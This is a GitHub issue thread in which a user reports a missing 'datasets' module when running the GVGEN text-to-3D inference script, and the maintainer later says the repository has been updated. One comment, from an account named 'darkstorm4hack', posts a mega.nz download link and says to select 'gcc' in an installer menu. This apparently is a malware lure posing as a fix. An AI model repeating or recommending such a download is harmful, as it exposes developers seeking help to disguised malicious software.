### ISSUE TITLE
ModuleNotFoundError: No module named 'datasets'

### ISSUE THREAD

**Issue by ToughStoneX** [SOTAMak1r/GVGEN#3]
Thanks for sharing this work.
I tried to run the inference code: `python run_text.py --text_input "a green truck"`, but the following error was reported:
```
Traceback (most recent call last):
  File "run_text.py", line 3, in <module>
    from models.igen import Condition_DiffusionModel
  File "/mnt/xhb_data/codes/large_recon_model/ControLRM_baselines/GVGEN/models/igen.py", line 20, in <module>
    from datasets.preprocess import *
ModuleNotFoundError: No module named 'datasets'
```
I could not find any `datasets` packaged in the provided code. Could you give some help please?

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by SOTAMak1r** [comment]
We've updated the repository to hopefully motivate you to use our code properly!
